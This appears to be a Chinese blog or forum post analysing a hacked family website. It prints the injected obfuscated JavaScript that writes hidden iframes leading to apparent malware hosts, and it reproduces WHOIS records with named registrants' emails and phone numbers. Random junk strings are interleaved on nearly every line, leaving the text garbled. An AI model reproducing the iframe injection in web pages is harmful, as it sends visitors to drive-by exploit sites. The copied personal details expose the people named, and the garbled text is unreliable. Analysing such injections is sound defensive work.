[原创]一篇刚写的分析木马手记

首发在我的博客里面， rSJ9v:  
m o:D9  
http://www.areway.cn/?p=175 |gU(s  
`+uhy,  
ma((2My'H  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： B:+6~&,-  
          O/<K!;(@?  
<script>t=’60,105,102,114,97,109,101, ,JEFGI{  
32,115,114,99,61,104,116,116,112,58,47,47, |Z*J/v'@p  
102,114,101,101,46,117,45,117,117,117,46,99, WASU0
 
110,47,101,114,114,111,114,46,104,116,109, (t4&,W_spA  
32,119,105,100,116,104,61,49,48,48,32,104, +9")KQT  
101,105,103,104,116,61,48,62,60,47,105,102, >2Kh0rIH  
114,97,109,101,62′; VL*ovD%-  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> Et/&^&=\-  
                                                                                                  !Uq^7Mw  
<script>t=’60,105,102,114,97,109,101,32,115, @0SC"CqM  
114,99,61,104,116,116,112,58,47,47,102,114, v_nj$1dY6  
101,101,46,117,45,117,117,117,46,99,110,47, V7Mh-]  
101,114,114,111,114,46,104,116,109,32,119, /<]{KI  
105,100,116,104,61,49,48,48,32,104,101,105, dx+hhg\L  
103,104,116,61,48,62,60,47,105,102,114,97, $]/Zxd  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); jb^N|zb  
document.write(t);</script> oDU ;E  
                                                                                                  g2T -TG'd  
<html xmlns=” [!U?}1YQ  
http://www.w3.org/1999/xhtml .;*s`t  
“> - h9?1vc7  
<head> wy}k1E'M  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –>
%!PM&zV  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> 9t#S= DP  
<title>首页 - 爱生活家庭网 ,Bal  
                                                                                                                                                    yd?x=|  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 #jxe%2'Ot  
转换字符串后的大概内容是（谁点击后果自付）： q2et|QCru  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… fOMvj%T@2  
                                                                                                                                  zBe8,, e  
查询玉米u-uuu.cn的详细信息： cwL1/DGDB  
Domain Name: u-uuu.cn !ki.t  
ROID: 20070901s10001s64972306-cn %C=]1Q=T)  
Domain Status: ok |e2be1LD  
Registrant Organization: 王雷 }eRD|1  
Registrant Name: 王雷 WuZ/C_  
Administrative Email: czlovexs@126.com w18y}mS"H  
Sponsoring Registrar: 北京万网志成科技有限公司 .k0~Vh2u  
Name Server:ns.yovole.com A21N|$[  
Name Server:ns1.yovole.com YR;^hs?  
Registration Date: 2007-09-01 17:54 as>L[jyG/  
Expiration Date: 2008-09-01 17:54 C,.Ee3T  
最后PING了一下地址 都没有什么…. 1"e)5xI  
                                                                                                 .fdL&z  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. _X'"w|0  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> PfZ+PqS  
<script language=”javascript” src=” ?:
L:EW8  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script mb!9&&2-t  
> U\sHx68  
这个玉米应该有可能是木马作者的： = hN !;7G  
foafau.info的详细信息： }ga@/>Sl&  
Access to INFO WHOIS information is provided to assist persons in S*,rGCt'T  
determining the contents of a domain name registration record in the w#g#8o>'  
Afilias registry database. The data in this record is provided by P';?YV0  
Afilias Limited for informational purposes only, and Afilias does not @, Wvvh  
guarantee its accuracy.  This service is intended only for query-based %3$*K\Ai  
access. You agree that you will use this data only for lawful purposes Vb'7>  
and that, under no circumstances will you use this data to: (a) allow, ;Yg{zhJX~  
enable, or otherwise support the transmission by e-mail, telephone, or U_{Ux2  
facsimile of mass unsolicited, commercial advertising or solicitations <!pvqNApg  
to entities other than the data recipient’s own existing customers; or <bD>m[8,  
(b) enable high volume, automated, electronic processes that send EVNY*&p  
queries or data to the systems of Registry Operator, a Registrar, or L^{|uP15N
 
Afilias except as reasonably necessary to register domain names or PtTHPAKj  
modify existing registrations. All rights reserved. Afilias reserves 5=1^T@~#&  
the right to modify these terms at any time. By submitting this query, D2,z)O%VK  
you agree to abide by this policy. wWp(yvz  
Domain ID:D22418703-LRMS =lVK IW  
Domain Name:FOAFAU.INFO
+|
ycvHd  
Created On:20-Nov-2007 16:05:42 UTC _BDK`D  
Last Updated On:20-Nov-2007 16:05:44 UTC +tD[9b! m  
Expiration Date:20-Nov-2008 16:05:42 UTC wW%4d  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) *tAg*$  
Status:CLIENT DELETE PROHIBITED <$hu   
Status:CLIENT RENEW PROHIBITED (k|_J42[  
Status:CLIENT TRANSFER PROHIBITED 0]jA<vLR  
Status:CLIENT UPDATE PROHIBITED t2r?N}"P  
Status:TRANSFER PROHIBITED PClMQL#  
Registrant ID:GODA-040110615 ]J#9\4Sq  
Registrant Name:liu hong nQ/E5y  
Registrant Organization: 25&J7\P*  
Registrant Street1:beijing |eWjYGwJa  
Registrant Street2: mSo_} je(  
Registrant Street3: ;IpT} ,  
Registrant City:beijing pm6>_Kz  
Registrant State/Province: (X?/"lC)  
Registrant Postal Code:100000 q`G,L(  
Registrant Country:CN +/ &_v^sC;  
Registrant Phone:+86.860108888777 "$}
vP<SM  
Registrant Phone Ext.: "XT"|KF|D  
Registrant FAX: =ID 2  
Registrant FAX Ext.: po}F6m8bX  
Registrant Email:bbbshiji@163.com 6AWKLFMV  
Admin ID:GODA-240110615 {N#KkYH{"  
Admin Name:liu hong DSj(]U~r  
Admin Organization: UYz0PSV=.  
Admin Street1:beijing 8dlw-Q'S  
Admin Street2: z-c}N
dW  
Admin Street3: Tt>8?  
Admin City:beijing +z$pg  
Admin State/Province: O%ug@& S{  
Admin Postal Code:100000 W\L`5CW  
Admin Country:CN "ax..Mh\y  
Admin Phone:+86.860108888777 <u=4*:QE  
Admin Phone Ext.: |> _!eS\=<  
Admin FAX: >pr=|$zk=  
Admin FAX Ext.: 36n>jS&  
Admin Email:bbbshiji@163.com !L95^g  
Billing ID:GODA-340110615 h)me\U7UC  
Billing Name:liu hong Q(o!iI:Gts  
Billing Organization: H&yD*@  
Billing Street1:beijing 5
IbJ  
Billing Street2: UQ.7>Ug+8s  
Billing Street3: ZlojbL@|4  
Billing City:beijing Eut
P\K_Y  
Billing State/Province: \t|M-%&)4  
Billing Postal Code:100000 NzW`B^p  
Billing Country:CN NxLXm,  
Billing Phone:+86.860108888777 /CIh2 ]#e  
Billing Phone Ext.: XhPe]P  
Billing FAX: g%k`  
Billing FAX Ext.: fkSwD(  
Billing Email:bbbshiji@163.com ILic.@st  
Tech ID:GODA-140110615 GAc{l=vT'  
Tech Name:liu hong 0W%@gs5d
&  
Tech Organization: > MH(0+B*  
Tech Street1:beijing E~kG2x{a  
Tech Street2: _0 m\[t.  
Tech Street3: PG]%Bv57  
Tech City:beijing Gx 72  
Tech State/Province: WW@d:R  
Tech Postal Code:100000 rP(eva  
Tech Country:CN Ou>vX[{  
Tech Phone:+86.860108888777 )}L??|#  
Tech Phone Ext.: BJS-Jy$-  
Tech FAX: ~j'l.gQb  
Tech FAX Ext.: "p3_y`h6+  
Tech Email:bbbshiji@163.com 9TAj) {U%'  
Name Server:NS27.DOMAINCONTROL.COM SI6B#u-i  
Name Server:NS28.DOMAINCONTROL.COM [>|FB'  
Name Server: >\!4Mk8  
Name Server: Bu]t*$  
Name Server: LA[g(i 7  
Name Server: jp+_@S>  
Name Server: Pe2wsR"_U  
Name Server: wIf {6z{  
Name Server: ,]5Ic.};p  
Name Server: Oi} T2I  
Name Server: &Sp -w?kM  
Name Server: ;;)`c/$  
Name Server: {>bW>RO)  
                                                                                                          ="d*E/##  
接着下载每个文件里面的代码： s[Ur~Wvn  
一步一步看.. 1J?dK|% b  
"EV!>^Z  
mw^7oO#  
qSx(X!YS  
dC1V-x10ju  
Xq4|uuS-O  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来